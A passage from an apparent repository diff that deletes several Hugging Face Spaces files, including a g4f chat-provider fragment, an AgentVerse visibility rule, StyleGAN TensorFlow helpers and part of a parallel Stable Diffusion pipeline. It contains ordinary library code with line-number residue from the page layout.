response = requests.post(f"https://beta.theb.ai/api/conversation?org_id={org_id}&req_rand={req_rand}",
|
71 |
-
headers=headers, json=json_data, stream=True)
|
72 |
-
|
73 |
-
response.raise_for_status()
|
74 |
-
content = ""
|
75 |
-
next_content = ""
|
76 |
-
for chunk in response.iter_lines():
|
77 |
-
if b"content" in chunk:
|
78 |
-
next_content = content
|
79 |
-
data = json.loads(chunk.decode().split("data: ")[1])
|
80 |
-
content = data["content"]
|
81 |
-
yield data["content"].replace(next_content, "")
|
82 |
-
|
83 |
-
@classmethod
|
84 |
-
@property
|
85 |
-
def params(cls):
|
86 |
-
params = [
|
87 |
-
("model", "str"),
|
88 |
-
("messages", "list[dict[str, str]]"),
|
89 |
-
("auth", "list[dict[str, str]]"),
|
90 |
-
("stream", "bool"),
|
91 |
-
("temperature", "float"),
|
92 |
-
("presence_penalty", "int"),
|
93 |
-
("frequency_penalty", "int"),
|
94 |
-
("top_p", "int")
|
95 |
-
]
|
96 |
-
param = ", ".join([": ".join(p) for p in params])
|
97 |
-
return f"g4f.provider.{cls.__name__} supports: ({param})"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/AgentVerse/agentVerse/agentverse/environments/simulation_env/rules/visibility/sde_team.py
DELETED
@@ -1,24 +0,0 @@
|
|
1 |
-
from __future__ import annotations
|
2 |
-
|
3 |
-
import random
|
4 |
-
from typing import TYPE_CHECKING, Any, List, Union
|
5 |
-
|
6 |
-
from . import visibility_registry as VisibilityRegistry
|
7 |
-
from .base import BaseVisibility
|
8 |
-
|
9 |
-
if TYPE_CHECKING:
|
10 |
-
from agentverse.environments import BaseEnvironment
|
11 |
-
|
12 |
-
|
13 |
-
@VisibilityRegistry.register("sde_team")
|
14 |
-
class SdeTeamVisibility(BaseVisibility):
|
15 |
-
"""
|
16 |
-
Visibility function for code problem. No need to change visibility.
|
17 |
-
|
18 |
-
"""
|
19 |
-
|
20 |
-
def update_visible_agents(self, environment: BaseEnvironment):
|
21 |
-
return
|
22 |
-
|
23 |
-
def reset(self):
|
24 |
-
return
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Agusbs98/automatic-ecg-diagnosis/README.md
DELETED
@@ -1,12 +0,0 @@
|
|
1 |
-
---
|
2 |
-
title: Automatic Ecg Diagnosis
|
3 |
-
emoji: 👁
|
4 |
-
colorFrom: indigo
|
5 |
-
colorTo: pink
|
6 |
-
sdk: gradio
|
7 |
-
sdk_version: 3.29.0
|
8 |
-
app_file: app.py
|
9 |
-
pinned: false
|
10 |
-
---
|
11 |
-
|
12 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Alican/pixera/options/__init__.py
DELETED
@@ -1 +0,0 @@
|
|
1 |
-
"""This package options includes option modules: training options, test options, and basic options (used in both training and test)."""
|
|
|
|
spaces/Amrrs/DragGan-Inversion/stylegan_human/dnnlib/tflib/tfutil.py
DELETED
@@ -1,267 +0,0 @@
|
|
1 |
-
# Copyright (c) SenseTime Research. All rights reserved.
|
2 |
-
|
3 |
-
# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
|
4 |
-
#
|
5 |
-
# This work is made available under the Nvidia Source Code License-NC.
|
6 |
-
# To view a copy of this license, visit
|
7 |
-
# https://nvlabs.github.io/stylegan2/license.html
|
8 |
-
|
9 |
-
"""Miscellaneous helper utils for Tensorflow."""
|
10 |
-
|
11 |
-
from typing import Any, Iterable, List, Union
|
12 |
-
import tensorflow.contrib # requires TensorFlow 1.x!
|
13 |
-
import os
|
14 |
-
import numpy as np
|
15 |
-
import tensorflow as tf
|
16 |
-
|
17 |
-
# Silence deprecation warnings from TensorFlow 1.13 onwards
|
18 |
-
import logging
|
19 |
-
logging.getLogger('tensorflow').setLevel(logging.ERROR)
|
20 |
-
tf.contrib = tensorflow.contrib
|
21 |
-
|
22 |
-
|
23 |
-
TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation]
|
24 |
-
"""A type that represents a valid Tensorflow expression."""
|
25 |
-
|
26 |
-
TfExpressionEx = Union[TfExpression, int, float, np.ndarray]
|
27 |
-
"""A type that can be converted to a valid Tensorflow expression."""
|
28 |
-
|
29 |
-
|
30 |
-
def run(*args, **kwargs) -> Any:
|
31 |
-
"""Run the specified ops in the default session."""
|
32 |
-
assert_tf_initialized()
|
33 |
-
return tf.get_default_session().run(*args, **kwargs)
|
34 |
-
|
35 |
-
|
36 |
-
def is_tf_expression(x: Any) -> bool:
|
37 |
-
"""Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation."""
|
38 |
-
return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation))
|
39 |
-
|
40 |
-
|
41 |
-
def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]:
|
42 |
-
"""Convert a Tensorflow shape to a list of ints. Retained for backwards compatibility -- use TensorShape.as_list() in new code."""
|
43 |
-
return [dim.value for dim in shape]
|
44 |
-
|
45 |
-
|
46 |
-
def flatten(x: TfExpressionEx) -> TfExpression:
|
47 |
-
"""Shortcut function for flattening a tensor."""
|
48 |
-
with tf.name_scope("Flatten"):
|
49 |
-
return tf.reshape(x, [-1])
|
50 |
-
|
51 |
-
|
52 |
-
def log2(x: TfExpressionEx) -> TfExpression:
|
53 |
-
"""Logarithm in base 2."""
|
54 |
-
with tf.name_scope("Log2"):
|
55 |
-
return tf.log(x) * np.float32(1.0 / np.log(2.0))
|
56 |
-
|
57 |
-
|
58 |
-
def exp2(x: TfExpressionEx) -> TfExpression:
|
59 |
-
"""Exponent in base 2."""
|
60 |
-
with tf.name_scope("Exp2"):
|
61 |
-
return tf.exp(x * np.float32(np.log(2.0)))
|
62 |
-
|
63 |
-
|
64 |
-
def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx:
|
65 |
-
"""Linear interpolation."""
|
66 |
-
with tf.name_scope("Lerp"):
|
67 |
-
return a + (b - a) * t
|
68 |
-
|
69 |
-
|
70 |
-
def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression:
|
71 |
-
"""Linear interpolation with clip."""
|
72 |
-
with tf.name_scope("LerpClip"):
|
73 |
-
return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0)
|
74 |
-
|
75 |
-
|
76 |
-
def absolute_name_scope(scope: str) -> tf.name_scope:
|
77 |
-
"""Forcefully enter the specified name scope, ignoring any surrounding scopes."""
|
78 |
-
return tf.name_scope(scope + "/")
|
79 |
-
|
80 |
-
|
81 |
-
def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope:
|
82 |
-
"""Forcefully enter the specified variable scope, ignoring any surrounding scopes."""
|
83 |
-
return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False)
|
84 |
-
|
85 |
-
|
86 |
-
def _sanitize_tf_config(config_dict: dict = None) -> dict:
|
87 |
-
# Defaults.
|
88 |
-
cfg = dict()
|
89 |
-
# Random seed for NumPy. None = keep as is.
|
90 |
-
cfg["rnd.np_random_seed"] = None
|
91 |
-
# Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is.
|
92 |
-
cfg["rnd.tf_random_seed"] = "auto"
|
93 |
-
# 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info.
|
94 |
-
cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1"
|
95 |
-
# False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used.
|
96 |
-
cfg["graph_options.place_pruned_graph"] = True
|
97 |
-
# False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed.
|
98 |
-
cfg["gpu_options.allow_growth"] = True
|
99 |
-
|
100 |
-
# Remove defaults for environment variables that are already set.
|
101 |
-
for key in list(cfg):
|
102 |
-
fields = key.split(".")
|
103 |
-
if fields[0] == "env":
|
104 |
-
assert len(fields) == 2
|
105 |
-
if fields[1] in os.environ:
|
106 |
-
del cfg[key]
|
107 |
-
|
108 |
-
# User overrides.
|
109 |
-
if config_dict is not None:
|
110 |
-
cfg.update(config_dict)
|
111 |
-
return cfg
|
112 |
-
|
113 |
-
|
114 |
-
def init_tf(config_dict: dict = None) -> None:
|
115 |
-
"""Initialize TensorFlow session using good default settings."""
|
116 |
-
# Skip if already initialized.
|
117 |
-
if tf.get_default_session() is not None:
|
118 |
-
return
|
119 |
-
|
120 |
-
# Setup config dict and random seeds.
|
121 |
-
cfg = _sanitize_tf_config(config_dict)
|
122 |
-
np_random_seed = cfg["rnd.np_random_seed"]
|
123 |
-
if np_random_seed is not None:
|
124 |
-
np.random.seed(np_random_seed)
|
125 |
-
tf_random_seed = cfg["rnd.tf_random_seed"]
|
126 |
-
if tf_random_seed == "auto":
|
127 |
-
tf_random_seed = np.random.randint(1 << 31)
|
128 |
-
if tf_random_seed is not None:
|
129 |
-
tf.set_random_seed(tf_random_seed)
|
130 |
-
|
131 |
-
# Setup environment variables.
|
132 |
-
for key, value in cfg.items():
|
133 |
-
fields = key.split(".")
|
134 |
-
if fields[0] == "env":
|
135 |
-
assert len(fields) == 2
|
136 |
-
os.environ[fields[1]] = str(value)
|
137 |
-
|
138 |
-
# Create default TensorFlow session.
|
139 |
-
create_session(cfg, force_as_default=True)
|
140 |
-
|
141 |
-
|
142 |
-
def assert_tf_initialized():
|
143 |
-
"""Check that TensorFlow session has been initialized."""
|
144 |
-
if tf.get_default_session() is None:
|
145 |
-
raise RuntimeError(
|
146 |
-
"No default TensorFlow session found. Please call dnnlib.tflib.init_tf().")
|
147 |
-
|
148 |
-
|
149 |
-
def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session:
|
150 |
-
"""Create tf.Session based on config dict."""
|
151 |
-
# Setup TensorFlow config proto.
|
152 |
-
cfg = _sanitize_tf_config(config_dict)
|
153 |
-
config_proto = tf.ConfigProto()
|
154 |
-
for key, value in cfg.items():
|
155 |
-
fields = key.split(".")
|
156 |
-
if fields[0] not in ["rnd", "env"]:
|
157 |
-
obj = config_proto
|
158 |
-
for field in fields[:-1]:
|
159 |
-
obj = getattr(obj, field)
|
160 |
-
setattr(obj, fields[-1], value)
|
161 |
-
|
162 |
-
# Create session.
|
163 |
-
session = tf.Session(config=config_proto)
|
164 |
-
if force_as_default:
|
165 |
-
# pylint: disable=protected-access
|
166 |
-
session._default_session = session.as_default()
|
167 |
-
session._default_session.enforce_nesting = False
|
168 |
-
session._default_session.__enter__()
|
169 |
-
return session
|
170 |
-
|
171 |
-
|
172 |
-
def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None:
|
173 |
-
"""Initialize all tf.Variables that have not already been initialized.
|
174 |
-
|
175 |
-
Equivalent to the following, but more efficient and does not bloat the tf graph:
|
176 |
-
tf.variables_initializer(tf.report_uninitialized_variables()).run()
|
177 |
-
"""
|
178 |
-
assert_tf_initialized()
|
179 |
-
if target_vars is None:
|
180 |
-
target_vars = tf.global_variables()
|
181 |
-
|
182 |
-
test_vars = []
|
183 |
-
test_ops = []
|
184 |
-
|
185 |
-
# ignore surrounding control_dependencies
|
186 |
-
with tf.control_dependencies(None):
|
187 |
-
for var in target_vars:
|
188 |
-
assert is_tf_expression(var)
|
189 |
-
|
190 |
-
try:
|
191 |
-
tf.get_default_graph().get_tensor_by_name(
|
192 |
-
var.name.replace(":0", "/IsVariableInitialized:0"))
|
193 |
-
except KeyError:
|
194 |
-
# Op does not exist => variable may be uninitialized.
|
195 |
-
test_vars.append(var)
|
196 |
-
|
197 |
-
with absolute_name_scope(var.name.split(":")[0]):
|
198 |
-
test_ops.append(tf.is_variable_initialized(var))
|
199 |
-
|
200 |
-
init_vars = [var for var, inited in zip(
|
201 |
-
test_vars, run(test_ops)) if not inited]
|
202 |
-
run([var.initializer for var in init_vars])
|
203 |
-
|
204 |
-
|
205 |
-
def set_vars(var_to_value_dict: dict) -> None:
|
206 |
-
"""Set the values of given tf.Variables.
|
207 |
-
|
208 |
-
Equivalent to the following, but more efficient and does not bloat the tf graph:
|
209 |
-
tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()]
|
210 |
-
"""
|
211 |
-
assert_tf_initialized()
|
212 |
-
ops = []
|
213 |
-
feed_dict = {}
|
214 |
-
|
215 |
-
for var, value in var_to_value_dict.items():
|
216 |
-
assert is_tf_expression(var)
|
217 |
-
|
218 |
-
try:
|
219 |
-
setter = tf.get_default_graph().get_tensor_by_name(
|
220 |
-
var.name.replace(":0", "/setter:0")) # look for existing op
|
221 |
-
except KeyError:
|
222 |
-
with absolute_name_scope(var.name.split(":")[0]):
|
223 |
-
# ignore surrounding control_dependencies
|
224 |
-
with tf.control_dependencies(None):
|
225 |
-
setter = tf.assign(var, tf.placeholder(
|
226 |
-
var.dtype, var.shape, "new_value"), name="setter") # create new setter
|
227 |
-
|
228 |
-
ops.append(setter)
|
229 |
-
feed_dict[setter.op.inputs[1]] = value
|
230 |
-
|
231 |
-
run(ops, feed_dict)
|
232 |
-
|
233 |
-
|
234 |
-
def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs):
|
235 |
-
"""Create tf.Variable with large initial value without bloating the tf graph."""
|
236 |
-
assert_tf_initialized()
|
237 |
-
assert isinstance(initial_value, np.ndarray)
|
238 |
-
zeros = tf.zeros(initial_value.shape, initial_value.dtype)
|
239 |
-
var = tf.Variable(zeros, *args, **kwargs)
|
240 |
-
set_vars({var: initial_value})
|
241 |
-
return var
|
242 |
-
|
243 |
-
|
244 |
-
def convert_images_from_uint8(images, drange=[-1, 1], nhwc_to_nchw=False):
|
245 |
-
"""Convert a minibatch of images from uint8 to float32 with configurable dynamic range.
|
246 |
-
Can be used as an input transformation for Network.run().
|
247 |
-
"""
|
248 |
-
images = tf.cast(images, tf.float32)
|
249 |
-
if nhwc_to_nchw:
|
250 |
-
images = tf.transpose(images, [0, 3, 1, 2])
|
251 |
-
return images * ((drange[1] - drange[0]) / 255) + drange[0]
|
252 |
-
|
253 |
-
|
254 |
-
def convert_images_to_uint8(images, drange=[-1, 1], nchw_to_nhwc=False, shrink=1):
|
255 |
-
"""Convert a minibatch of images from float32 to uint8 with configurable dynamic range.
|
256 |
-
Can be used as an output transformation for Network.run().
|
257 |
-
"""
|
258 |
-
images = tf.cast(images, tf.float32)
|
259 |
-
if shrink > 1:
|
260 |
-
ksize = [1, 1, shrink, shrink]
|
261 |
-
images = tf.nn.avg_pool(
|
262 |
-
images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW")
|
263 |
-
if nchw_to_nhwc:
|
264 |
-
images = tf.transpose(images, [0, 2, 3, 1])
|
265 |
-
scale = 255 / (drange[1] - drange[0])
|
266 |
-
images = images * scale + (0.5 - drange[0] * scale)
|
267 |
-
return tf.saturate_cast(images, tf.uint8)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_paradigms.py
DELETED
@@ -1,770 +0,0 @@
|
|
1 |
-
# Copyright 2023 ParaDiGMS authors and The HuggingFace Team. All rights reserved.
|
2 |
-
#
|
3 |
-
# Licensed under the Apache License, Version 2.0 (the "License");
|
4 |
-
# you may not use this file except in compliance with the License.
|
5 |
-
# You may obtain a copy of the License at
|
6 |
-
#
|
7 |
-
# http://www.apache.org/licenses/LICENSE-2.0
|
8 |
-
#
|
9 |
-
# Unless required by applicable law or agreed to in writing, software
|
10 |
-
# distributed under the License is distributed on an "AS IS" BASIS,
|
11 |
-
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
12 |
-
# See the License for the specific language governing permissions and
|
13 |
-
# limitations under the License.
|
14 |
-
|
15 |
-
import inspect
|
16 |
-
from typing import Any, Callable, Dict, List, Optional, Union
|
17 |
-
|
18 |
-
import torch
|
19 |
-
from transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer
|
20 |
-
|
21 |
-
from ...image_processor import VaeImageProcessor
|
22 |
-
from ...loaders import FromSingleFileMixin, LoraLoaderMixin, TextualInversionLoaderMixin
|
23 |
-
from ...models import AutoencoderKL, UNet2DConditionModel
|
24 |
-
from ...schedulers import KarrasDiffusionSchedulers
|
25 |
-
from ...utils import (
|
26 |
-
is_accelerate_available,
|
27 |
-
is_accelerate_version,
|
28 |
-
logging,
|
29 |
-
randn_tensor,
|
30 |
-
replace_example_docstring,
|
31 |
-
)
|
32 |
-
from ..pipeline_utils import DiffusionPipeline
|
33 |
-
from . import StableDiffusionPipelineOutput
|
34 |
-
from .safety_checker import StableDiffusionSafetyChecker
|
35 |
-
|
36 |
-
|
37 |
-
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
|
38 |
-
|
39 |
-
EXAMPLE_DOC_STRING = """
|
40 |
-
Examples:
|
41 |
-
```py
|
42 |
-
>>> import torch
|
43 |
-
>>> from diffusers import DDPMParallelScheduler
|
44 |
-
>>> from diffusers import StableDiffusionParadigmsPipeline
|
45 |
-
|
46 |
-
>>> scheduler = DDPMParallelScheduler.from_pretrained("runwayml/stable-diffusion-v1-5", subfolder="scheduler")
|
47 |
-
|
48 |
-
>>> pipe = StableDiffusionParadigmsPipeline.from_pretrained(
|
49 |
-
... "runwayml/stable-diffusion-v1-5", scheduler=scheduler, torch_dtype=torch.float16
|
50 |
-
... )
|
51 |
-
>>> pipe = pipe.to("cuda")
|
52 |
-
|
53 |
-
>>> ngpu, batch_per_device = torch.cuda.device_count(), 5
|
54 |
-
>>> pipe.wrapped_unet = torch.nn.DataParallel(pipe.unet, device_ids=[d for d in range(ngpu)])
|
55 |
-
|
56 |
-
>>> prompt = "a photo of an astronaut riding a horse on mars"
|
57 |
-
>>> image = pipe(prompt, parallel=ngpu * batch_per_device, num_inference_steps=1000).images[0]
|
58 |
-
```
|
59 |
-
"""
|
60 |
-
|
61 |
-
|
62 |
-
class StableDiffusionParadigmsPipeline(
|
63 |
-
DiffusionPipeline, TextualInversionLoaderMixin, LoraLoaderMixin, FromSingleFileMixin
|
64 |
-
):
|
65 |
-
r"""
|
66 |
-
Pipeline for text-to-image generation using a parallelized version of Stable Diffusion.
|
67 |
-
|
68 |
-
This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
|
69 |
-
implemented for all pipelines (downloading, saving, running on a particular device, etc.).
|
70 |
-
|
71 |
-
The pipeline also inherits the following loading methods:
|
72 |
-
- [`~loaders.TextualInversionLoaderMixin.load_textual_inversion`] for loading textual inversion embeddings
|
73 |
-
- [`~loaders.LoraLoaderMixin.load_lora_weights`] for loading LoRA weights
|
74 |
-
- [`~loaders.LoraLoaderMixin.save_lora_weights`] for saving LoRA weights
|
75 |
-
- [`~loaders.FromSingleFileMixin.from_single_file`] for loading `.ckpt` files
|
76 |
-
|
77 |
-
Args:
|
78 |
-
vae ([`AutoencoderKL`]):
|
79 |
-
Variational Auto-Encoder (VAE) model to encode and decode images to and from latent representations.
|
80 |
-
text_encoder ([`~transformers.CLIPTextModel`]):
|
81 |
-
Frozen text-encoder ([clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)).
|
82 |
-
tokenizer ([`~transformers.CLIPTokenizer`]):
|
83 |
-
A `CLIPTokenizer` to tokenize text.
|
84 |
-
unet ([`UNet2DConditionModel`]):
|
85 |
-
A `UNet2DConditionModel` to denoise the encoded image latents.
|
86 |
-
scheduler ([`SchedulerMixin`]):
|
87 |
-
A scheduler to be used in combination with `unet` to denoise the encoded image latents. Can be one of
|
88 |
-
[`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`].
|
89 |
-
safety_checker ([`StableDiffusionSafetyChecker`]):
|
90 |
-
Classification module that estimates whether generated images could be considered offensive or harmful.
|
91 |
-
Please refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for more details
|
92 |
-
about a model's potential harms.
|
93 |
-
feature_extractor ([`~transformers.CLIPImageProcessor`]):
|
94 |
-
A `CLIPImageProcessor` to extract features from generated images; used as inputs to the `safety_checker`.
|
95 |
-
"""
|
96 |
-
_optional_components = ["safety_checker", "feature_extractor"]
|
97 |
-
|
98 |
-
def __init__(
|
99 |
-
self,
|
100 |
-
vae: AutoencoderKL,
|
101 |
-
text_encoder: CLIPTextModel,
|
102 |
-
tokenizer: CLIPTokenizer,
|
103 |
-
unet: UNet2DConditionModel,
|
104 |
-
scheduler: KarrasDiffusionSchedulers,
|
105 |
-
safety_checker: StableDiffusionSafetyChecker,
|
106 |
-
feature_extractor: CLIPImageProcessor,
|
107 |
-
requires_safety_checker: bool = True,
|
108 |
-
):
|
109 |
-
super().__init__()
|
110 |
-
|
111 |
-
if safety_checker is None and requires_safety_checker:
|
112 |
-
logger.warning(
|
113 |
-
f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure"
|
114 |
-
" that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered"
|
115 |
-
" results in services or applications open to the public. Both the diffusers team and Hugging Face"
|
116 |
-
" strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling"
|
117 |
-
" it only for use-cases that involve analyzing network behavior or auditing its results. For more"
|
118 |
-
" information, please have a look at https://github.com/huggingface/diffusers/pull/254 ."
|
119 |
-
)
|
120 |
-
|
121 |
-
if safety_checker is not None and feature_extractor is None:
|
122 |
-
raise ValueError(
|
123 |
-
"Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety"
|
124 |
-
" checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead."
|
125 |
-
)
|
126 |
-
|
127 |
-
self.register_modules(
|
128 |
-
vae=vae,
|
129 |
-
text_encoder=text_encoder,
|
130 |
-
tokenizer=tokenizer,
|
131 |
-
unet=unet,
|
132 |
-
scheduler=scheduler,
|
133 |
-
safety_checker=safety_checker,
|
134 |
-
feature_extractor=feature_extractor,
|
135 |
-
)
|
136 |
-
self.vae_scale_factor = 2 ** (len(self.vae.config.block_out_channels) - 1)
|
137 |
-
self.image_processor = VaeImageProcessor(vae_scale_factor=self.vae_scale_factor)
|
138 |
-
self.register_to_config(requires_safety_checker=requires_safety_checker)
|
139 |
-
|
140 |
-
# attribute to wrap the unet with torch.nn.DataParallel when running multiple denoising steps on multiple GPUs
|
141 |
-
self.wrapped_unet = self.unet
|
142 |
-
|
143 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_slicing
|
144 |
-
def enable_vae_slicing(self):
|
145 |
-
r"""
|
146 |
-
Enable sliced VAE decoding. When this option is enabled, the VAE will split the input tensor in slices to
|
147 |
-
compute decoding in several steps. This is useful to save some memory and allow larger batch sizes.
|
148 |
-
"""
|
149 |
-
self.vae.enable_slicing()
|
150 |
-
|
151 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_slicing
|
152 |
-
def disable_vae_slicing(self):
|
153 |
-
r"""
|
154 |
-
Disable sliced VAE decoding. If `enable_vae_slicing` was previously enabled, this method will go back to
|
155 |
-
computing decoding in one step.
|
156 |
-
"""
|
157 |
-
self.vae.disable_slicing()
|
158 |
-
|
159 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_tiling
|
160 |
-
def enable_vae_tiling(self):
|
161 |
-
r"""
|
162 |
-
Enable tiled VAE decoding. When this option is enabled, the VAE will split the input tensor into tiles to
|
163 |
-
compute decoding and encoding in several steps. This is useful for saving a large amount of memory and to allow
|
164 |
-
processing larger images.
|
165 |
-
"""
|
166 |
-
self.vae.enable_tiling()
|
167 |
-
|
168 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_tiling
|
169 |
-
def disable_vae_tiling(self):
|
170 |
-
r"""
|
171 |
-
Disable tiled VAE decoding. If `enable_vae_tiling` was previously enabled, this method will go back to
|
172 |
-
computing decoding in one step.
|
173 |
-
"""
|
174 |
-
self.vae.disable_tiling()
|
175 |
-
|
176 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_model_cpu_offload
|
177 |
-
def enable_model_cpu_offload(self, gpu_id=0):
|
178 |
-
r"""
|
179 |
-
Offload all models to CPU to reduce memory usage with a low impact on performance. Moves one whole model at a
|
180 |
-
time to the GPU when its `forward` method is called, and the model remains in GPU until the next model runs.
|
181 |
-
Memory savings are lower than using `enable_sequential_cpu_offload`, but performance is much better due to the
|
182 |
-
iterative execution of the `unet`.
|
183 |
-
"""
|
184 |
-
if is_accelerate_available() and is_accelerate_version(">=", "0.17.0.dev0"):
|
185 |
-
from accelerate import cpu_offload_with_hook
|
186 |
-
else:
|
187 |
-
raise ImportError("`enable_model_cpu_offload` requires `accelerate v0.17.0` or higher.")
|
188 |
-
|
189 |
-
device = torch.device(f"cuda:{gpu_id}")
|
190 |
-
|
191 |
-
if self.device.type != "cpu":
|
192 |
-
self.to("cpu", silence_dtype_warnings=True)
|
193 |
-
torch.cuda.empty_cache() # otherwise we don't see the memory savings (but they probably exist)
|
194 |
-
|
195 |
-
hook = None
|
196 |
-
for cpu_offloaded_model in [self.text_encoder, self.unet, self.vae]:
|
197 |
-
_, hook = cpu_offload_with_hook(cpu_offloaded_model, device, prev_module_hook=hook)
|
198 |
-
|
199 |
-
if self.safety_checker is not None:
|
200 |
-
_, hook = cpu_offload_with_hook(self.safety_checker, device, prev_module_hook=hook)
|
201 |
-
|
202 |
-
# We'll offload the last model manually.
|
203 |
-
self.final_offload_hook = hook
|
204 |
-
|
205 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._encode_prompt
|
206 |
-
def _encode_prompt(
|
207 |
-
self,
|
208 |
-
prompt,
|
209 |
-
device,
|
210 |
-
num_images_per_prompt,
|
211 |
-
do_classifier_free_guidance,
|
212 |
-
negative_prompt=None,
|
213 |
-
prompt_embeds: Optional[torch.FloatTensor] = None,
|
214 |
-
negative_prompt_embeds: Optional[torch.FloatTensor] = None,
|
215 |
-
lora_scale: Optional[float] = None,
|
216 |
-
):
|
217 |
-
r"""
|
218 |
-
Encodes the prompt into text encoder hidden states.
|
219 |
-
|
220 |
-
Args:
|
221 |
-
prompt (`str` or `List[str]`, *optional*):
|
222 |
-
prompt to be encoded
|
223 |
-
device: (`torch.device`):
|
224 |
-
torch device
|
225 |
-
num_images_per_prompt (`int`):
|
226 |
-
number of images that should be generated per prompt
|
227 |
-
do_classifier_free_guidance (`bool`):
|
228 |
-
whether to use classifier free guidance or not
|
229 |
-
negative_prompt (`str` or `List[str]`, *optional*):
|
230 |
-
